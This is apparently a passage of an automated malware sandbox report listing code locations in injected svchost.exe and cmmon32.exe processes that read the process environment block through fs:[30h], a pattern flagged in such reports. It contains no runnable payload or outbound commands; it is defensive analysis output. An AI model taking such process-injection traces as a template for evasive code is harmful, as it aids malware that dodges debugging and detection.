          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ADFE3F mov eax, dword ptr fs:[00000030h]3_2_03ADFE3F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C600 mov eax, dword ptr fs:[00000030h]3_2_03A2C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C600 mov eax, dword ptr fs:[00000030h]3_2_03A2C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2C600 mov eax, dword ptr fs:[00000030h]3_2_03A2C600
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A58E00 mov eax, dword ptr fs:[00000030h]3_2_03A58E00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1608 mov eax, dword ptr fs:[00000030h]3_2_03AE1608
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A61C mov eax, dword ptr fs:[00000030h]3_2_03A5A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A61C mov eax, dword ptr fs:[00000030h]3_2_03A5A61C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3766D mov eax, dword ptr fs:[00000030h]3_2_03A3766D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AE73 mov eax, dword ptr fs:[00000030h]3_2_03A4AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AE73 mov eax, dword ptr fs:[00000030h]3_2_03A4AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AE73 mov eax, dword ptr fs:[00000030h]3_2_03A4AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AE73 mov eax, dword ptr fs:[00000030h]3_2_03A4AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4AE73 mov eax, dword ptr fs:[00000030h]3_2_03A4AE73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A37E41 mov eax, dword ptr fs:[00000030h]3_2_03A37E41
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEAE44 mov eax, dword ptr fs:[00000030h]3_2_03AEAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEAE44 mov eax, dword ptr fs:[00000030h]3_2_03AEAE44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF05AC mov eax, dword ptr fs:[00000030h]3_2_03AF05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF05AC mov eax, dword ptr fs:[00000030h]3_2_03AF05AC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A535A1 mov eax, dword ptr fs:[00000030h]3_2_03A535A1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A51DB5 mov eax, dword ptr fs:[00000030h]3_2_03A51DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A51DB5 mov eax, dword ptr fs:[00000030h]3_2_03A51DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A51DB5 mov eax, dword ptr fs:[00000030h]3_2_03A51DB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52581 mov eax, dword ptr fs:[00000030h]3_2_03A52581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52581 mov eax, dword ptr fs:[00000030h]3_2_03A52581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52581 mov eax, dword ptr fs:[00000030h]3_2_03A52581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A52581 mov eax, dword ptr fs:[00000030h]3_2_03A52581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A22D8A mov eax, dword ptr fs:[00000030h]3_2_03A22D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A22D8A mov eax, dword ptr fs:[00000030h]3_2_03A22D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A22D8A mov eax, dword ptr fs:[00000030h]3_2_03A22D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A22D8A mov eax, dword ptr fs:[00000030h]3_2_03A22D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A22D8A mov eax, dword ptr fs:[00000030h]3_2_03A22D8A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5FD9B mov eax, dword ptr fs:[00000030h]3_2_03A5FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5FD9B mov eax, dword ptr fs:[00000030h]3_2_03A5FD9B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_03A3D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3D5E0 mov eax, dword ptr fs:[00000030h]3_2_03A3D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_03AEFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_03AEFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_03AEFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEFDE2 mov eax, dword ptr fs:[00000030h]3_2_03AEFDE2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD8DF1 mov eax, dword ptr fs:[00000030h]3_2_03AD8DF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov ecx, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6DC9 mov eax, dword ptr fs:[00000030h]3_2_03AA6DC9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A2AD30 mov eax, dword ptr fs:[00000030h]3_2_03A2AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A33D34 mov eax, dword ptr fs:[00000030h]3_2_03A33D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AEE539 mov eax, dword ptr fs:[00000030h]3_2_03AEE539
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8D34 mov eax, dword ptr fs:[00000030h]3_2_03AF8D34
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AAA537 mov eax, dword ptr fs:[00000030h]3_2_03AAA537
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54D3B mov eax, dword ptr fs:[00000030h]3_2_03A54D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54D3B mov eax, dword ptr fs:[00000030h]3_2_03A54D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A54D3B mov eax, dword ptr fs:[00000030h]3_2_03A54D3B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4C577 mov eax, dword ptr fs:[00000030h]3_2_03A4C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4C577 mov eax, dword ptr fs:[00000030h]3_2_03A4C577
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A63D43 mov eax, dword ptr fs:[00000030h]3_2_03A63D43
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA3540 mov eax, dword ptr fs:[00000030h]3_2_03AA3540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AD3D40 mov eax, dword ptr fs:[00000030h]3_2_03AD3D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A47D50 mov eax, dword ptr fs:[00000030h]3_2_03A47D50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A3849B mov eax, dword ptr fs:[00000030h]3_2_03A3849B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE14FB mov eax, dword ptr fs:[00000030h]3_2_03AE14FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_03AA6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_03AA6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6CF0 mov eax, dword ptr fs:[00000030h]3_2_03AA6CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF8CD6 mov eax, dword ptr fs:[00000030h]3_2_03AF8CD6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5BC2C mov eax, dword ptr fs:[00000030h]3_2_03A5BC2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AA6C0A mov eax, dword ptr fs:[00000030h]3_2_03AA6C0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AF740D mov eax, dword ptr fs:[00000030h]3_2_03AF740D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03AE1C06 mov eax, dword ptr fs:[00000030h]3_2_03AE1C06
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A4746D mov eax, dword ptr fs:[00000030h]3_2_03A4746D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A5A44B mov eax, dword ptr fs:[00000030h]3_2_03A5A44B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC450 mov eax, dword ptr fs:[00000030h]3_2_03ABC450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03ABC450 mov eax, dword ptr fs:[00000030h]3_2_03ABC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04570050 mov eax, dword ptr fs:[00000030h]7_2_04570050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04570050 mov eax, dword ptr fs:[00000030h]7_2_04570050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EC450 mov eax, dword ptr fs:[00000030h]7_2_045EC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EC450 mov eax, dword ptr fs:[00000030h]7_2_045EC450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04612073 mov eax, dword ptr fs:[00000030h]7_2_04612073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458A44B mov eax, dword ptr fs:[00000030h]7_2_0458A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04621074 mov eax, dword ptr fs:[00000030h]7_2_04621074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457746D mov eax, dword ptr fs:[00000030h]7_2_0457746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D7016 mov eax, dword ptr fs:[00000030h]7_2_045D7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6C0A mov eax, dword ptr fs:[00000030h]7_2_045D6C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04611C06 mov eax, dword ptr fs:[00000030h]7_2_04611C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0462740D mov eax, dword ptr fs:[00000030h]7_2_0462740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458BC2C mov eax, dword ptr fs:[00000030h]7_2_0458BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458002D mov eax, dword ptr fs:[00000030h]7_2_0458002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04624015 mov eax, dword ptr fs:[00000030h]7_2_04624015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04624015 mov eax, dword ptr fs:[00000030h]7_2_04624015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456B02A mov eax, dword ptr fs:[00000030h]7_2_0456B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov ecx, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045EB8D0 mov eax, dword ptr fs:[00000030h]7_2_045EB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_046114FB mov eax, dword ptr fs:[00000030h]7_2_046114FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D6CF0 mov eax, dword ptr fs:[00000030h]7_2_045D6CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628CD6 mov eax, dword ptr fs:[00000030h]7_2_04628CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045558EC mov eax, dword ptr fs:[00000030h]7_2_045558EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0456849B mov eax, dword ptr fs:[00000030h]7_2_0456849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559080 mov eax, dword ptr fs:[00000030h]7_2_04559080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3884 mov eax, dword ptr fs:[00000030h]7_2_045D3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3884 mov eax, dword ptr fs:[00000030h]7_2_045D3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov ecx, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov eax, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458F0BF mov eax, dword ptr fs:[00000030h]7_2_0458F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045990AF mov eax, dword ptr fs:[00000030h]7_2_045990AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045820A0 mov eax, dword ptr fs:[00000030h]7_2_045820A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04577D50 mov eax, dword ptr fs:[00000030h]7_2_04577D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457B944 mov eax, dword ptr fs:[00000030h]7_2_0457B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457B944 mov eax, dword ptr fs:[00000030h]7_2_0457B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04593D43 mov eax, dword ptr fs:[00000030h]7_2_04593D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045D3540 mov eax, dword ptr fs:[00000030h]7_2_045D3540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C577 mov eax, dword ptr fs:[00000030h]7_2_0457C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0457C577 mov eax, dword ptr fs:[00000030h]7_2_0457C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B171 mov eax, dword ptr fs:[00000030h]7_2_0455B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455B171 mov eax, dword ptr fs:[00000030h]7_2_0455B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455C962 mov eax, dword ptr fs:[00000030h]7_2_0455C962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04559100 mov eax, dword ptr fs:[00000030h]7_2_04559100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04628D34 mov eax, dword ptr fs:[00000030h]7_2_04628D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458513A mov eax, dword ptr fs:[00000030h]7_2_0458513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0458513A mov eax, dword ptr fs:[00000030h]7_2_0458513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04563D34 mov eax, dword ptr fs:[00000030h]7_2_04563D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04584D3B mov eax, dword ptr fs:[00000030h]7_2_04584D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_0455AD30 mov eax, dword ptr fs:[00000030h]7_2_0455AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_045DA537 mov eax, dword ptr fs:[00000030h]7_2_045DA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 7_2_04574120 mov eax, dword ptr fs:[00000030h]7_2_04574120
